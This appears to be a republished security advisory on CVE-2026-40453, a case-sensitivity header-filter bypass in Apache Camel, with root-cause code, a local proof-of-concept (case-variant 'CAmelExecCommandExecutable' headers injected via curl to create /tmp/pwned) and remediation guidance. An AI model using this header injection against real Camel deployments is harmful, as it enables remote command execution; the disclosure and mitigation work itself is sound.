CVE-2026-40453: Apache Camel Case‑Insensitive Header Injection Vulnerability (PoC Released)
CVE‑2026‑40453 is a medium‑severity Apache Camel flaw where case‑insensitive header handling lets attackers inject malformed internal control headers, bypass filters and achieve remote code execution or arbitrary file writes, with a public PoC and detailed mitigation guidance provided.
Vulnerability Overview
CVE‑2026‑40453 is an Improper Handling of Case Sensitivity issue in Apache Camel (MEDIUM severity). It is an incomplete fix of CVE‑2025‑27636. Attackers with producer rights on JMS, CoAP, SJMS, or Google Pub/Sub can send headers whose names differ only in case, bypassing HeaderFilterStrategy and causing remote code execution or arbitrary file write.
Risk Summary
CVE ID: CVE‑2026‑40453
Type: CWE‑20 Improper Input Validation – Header Injection
Severity: Medium
Affected components: camel‑jms, camel‑sjms, camel‑coap, camel‑google‑pubsub
Affected classes: JmsHeaderFilterStrategy, ClassicJmsHeaderFilterStrategy, SjmsHeaderFilterStrategy, CoAPHeaderFilterStrategy, GooglePubsubHeaderFilterStrategy
Versions impacted: 3.0.0‑4.14.5, 4.15.0‑4.18.1, 4.19.0‑4.20.0 (pre‑4.20.0)
Fixed in: 4.14.6, 4.18.2, 4.20.0
Prerequisite for exploitation: producer permission on the target protocol
Impact: Remote Code Execution / Arbitrary File Write
Technical Root‑Cause Analysis
Vulnerability Principle
Apache Camel components filter internal control headers via HeaderFilterStrategy. The HTTP implementation was patched to call setLowerCase(true), making filtering case‑insensitive. Five non‑HTTP strategies (CoAP, JMS, SJMS, Google Pub/Sub, etc.) omitted this call, leaving case‑sensitive filtering.
public HttpHeaderFilterStrategy() {
setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
setInFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
setLowerCase(true); // added in CVE‑2025‑27636 fix
} public CoAPHeaderFilterStrategy() {
setOutFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
setInFilterStartsWith(CAMEL_FILTER_STARTS_WITH);
// missing setLowerCase(true) → case‑sensitive filtering
}Camel Exchange stores headers in a case‑insensitive map. A header like CAmelExecCommandExecutable bypasses the case‑sensitive filter, is stored under its canonical name CamelExecCommandExecutable, and downstream components such as camel‑exec or camel‑file interpret it as a command.
Attack Path
Attacker sends CoAP/JMS request
↓
URI‑Query parameters become Exchange In Headers
↓
CoAPHeaderFilterStrategy.applyFilterToExternalHeaders()
↓
"CAmelExecCommandExecutable" fails startsWith("Camel") → not filtered
↓
Header stored in Camel Exchange (case‑insensitive map)
↓
camel‑exec resolves header as CamelExecCommandExecutable
↓
Remote Code Execution / Arbitrary File WriteProof‑of‑Concept
PoC uses the camel‑coap component (self‑contained). Repository: https://github.com/sarojkpr/CVE-2026-40453
Vulnerable Route
from("coap://0.0.0.0:5683/run")
.to("exec:echo?args=hello")
.convertBodyTo(String.class);Normal Request
curl http://localhost:8080/exploit/normal
# returns: helloCanonical Header (filtered)
curl http://localhost:8080/exploit/canonical
# inject CamelExecCommandExecutable / CamelExecCommandArgs
# result: /tmp/pwned‑canonical created: false (blocked)Case‑Variant Header (bypass – RCE)
curl http://localhost:8080/exploit/attack
# inject CAmelExecCommandExecutable / CAmelExecCommandArgs
# result: /tmp/pwned created: true (RCE succeeded)Reproduction Steps
git clone https://github.com/sarojkpr/CVE-2026-40453
cd CVE-2026-40453
mvn clean package -DskipTests
docker compose up -d --build
# run the three curl commands above to observe differences
docker compose downImpact Scope
Any integration scenario using the affected components with downstream producers such as exec, file, or direct is vulnerable. Typical enterprise message‑routing setups that rely on JMS, SJMS, CoAP, or Google Pub/Sub are affected.
Remediation
Upgrade (Preferred)
4.14.x → 4.14.6
4.15.x‑4.18.x → 4.18.2
4.19.x‑4.20.x → 4.20.0
Major version upgrades may introduce API changes; test before production deployment.
Temporary Mitigations
Filter Camel internal headers case‑insensitively in all pipelines.
Restrict unauthorized access to JMS/CoAP/other protocols; block anonymous producers.
Audit routes and remove or restrict high‑risk producers ( exec, file).
Isolate Camel routing components on separate network segments.
Vulnerability Timeline
2025‑03: CVE‑2025‑27636 disclosed; HttpHeaderFilterStrategy patched with setLowerCase(true).
2025‑03‑09: Patch announcement.
~2025: Researcher discovered five other strategies remained unpatched.
2026: CAMEL‑23313 patch submitted, fixing all five components.
2026: CVE‑2026‑40453 officially disclosed; PoC released.
References
Apache Camel security advisory: https://camel.apache.org/security/CVE-2026-40453.html
JIRA issue CAMEL‑23313: https://issues.apache.org/jira/browse/CAMEL-23313
CVE record: https://www.cve.org/CVERecord?id=CVE-2026-40453
PoC repository: https://github.com/sarojkpr/CVE-2026-40453
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Black & White Path
We are the beacon of the cyber world, a stepping stone on the road to security.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.
